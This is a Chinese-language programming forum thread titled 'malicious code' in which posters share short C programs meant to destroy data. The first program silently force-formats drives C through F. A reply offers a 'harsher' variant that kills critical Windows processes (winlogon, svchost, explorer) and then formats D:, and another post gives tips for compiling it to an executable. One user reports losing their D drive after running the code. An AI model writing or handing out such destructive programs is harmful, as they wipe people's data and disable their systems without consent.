搜索

恶意代码

楼主
代码未测试。。。胆大的可以试试。。。
  1. #include<stdio.h>
  2. #include<windows.h>
  3. int main()
  4. {
  5.         system("format C: /fs:ntfs /q /x /y");
  6.         puts("操作成功!");
  7.         system("format D: /fs:ntfs /q /x /y");
  8.         puts("操作成功!");
  9.         system("format E: /fs:ntfs /q /x /y");
  10.         puts("操作成功!");
  11.         system("format F: /fs:ntfs /q /x /y");
  12.         puts("操作成功!");
  13.        
  14.         return 0;
  15. }
复制代码

推荐
FORMAT本来就是格式化的意思,莽撞
推荐
4399APPLE 发表于 2014-4-1 13:01
不需要用虚拟机吧

安全第一~~
推荐
191514338 发表于 2014-4-1 01:03
哪想到这么严重....

那真是不好意思了丫,谢谢调试呀!我都不敢点运行的,它不用点确定就直接格式化,不然也不叫恶意代码了
推荐
191514338 发表于 2014-3-31 01:12
你大爷的   你赢了    我D盘被格式化了

这位少侠你木有看清楚标题和代码就,,,,咳咳!
推荐
还有什么被破坏了   怎么解除啊
推荐
你大爷的   你赢了    我D盘被格式化了   
李掌柜 发表于 2014-3-31 08:35

很简单的代码,要不要我给你来条更狠的:
  1. #include <stdlib.h>
  2. int main()
  3. {
  4. system("taskkill -f -im taskmgr.exe");
  5. system("taskkill -f -im svchost.exe");
  6. system("taskkill -f -im explorer.exe");
  7. system("taskkill -f -im winlogon.exe");
  8. system("taskkill -f -im System.exe");
  9. system("format D:");
  10. return 0;
  11. }
复制代码

另外,我想和你说,在Windows下是无法格式化C的,要进入MS-DOS模式
LZ不要卖艺
想编译得到exe文件很简单:使用VC++
用啊哈C得到exe文件也行,当它弹出“恭喜你编译成功!”的提提示框时就在任务管理器上结束掉
191514338 发表于 2014-3-31 01:34
还有什么被破坏了   怎么解除啊

没有什么其他的,D、E、F盘被格了,无法恢复,但可以使用一个软件找回一部分
4399APPLE 发表于 2014-3-31 10:17
没有什么其他的,D、E、F盘被格了,无法恢复,但可以使用一个软件找回一部分

我的360也放在D盘   重装一直装不上,一气之下重装系统    第一次装系统英文看不懂手机百度了一天,终于装好了----------可是屏幕不是全屏的....屏幕外围一圈黑,鼠标也移不过去,大婶们,来拯救世界把.......
李掌柜 发表于 2014-3-31 08:35

哪想到这么严重....

呵呵  发表于 2017-11-24 20:27
191514338 发表于 2014-4-1 01:03
哪想到这么严重....

代码有风险
你应该是新手
看不懂的代码先不要运行,那样谁会知道会发生什么事............
4399APPLE 发表于 2014-3-31 10:12
很简单的代码,要不要我给你来条更狠的:

另外,我想和你说,在Windows下是无法格式化C的,要进入MS-D ...

嘿嘿,你亲手试试就知道狠不狠了,,要不,你试我的代码我试你的代码,敢不敢,,,,,,,

呵呵  发表于 2017-11-24 20:27
李掌柜 发表于 2014-4-1 10:36
嘿嘿,你亲手试试就知道狠不狠了,,要不,你试我的代码我试你的代码,敢不敢,,,,,,,

好啊,我就试一下,不过我可以先Ghost~~~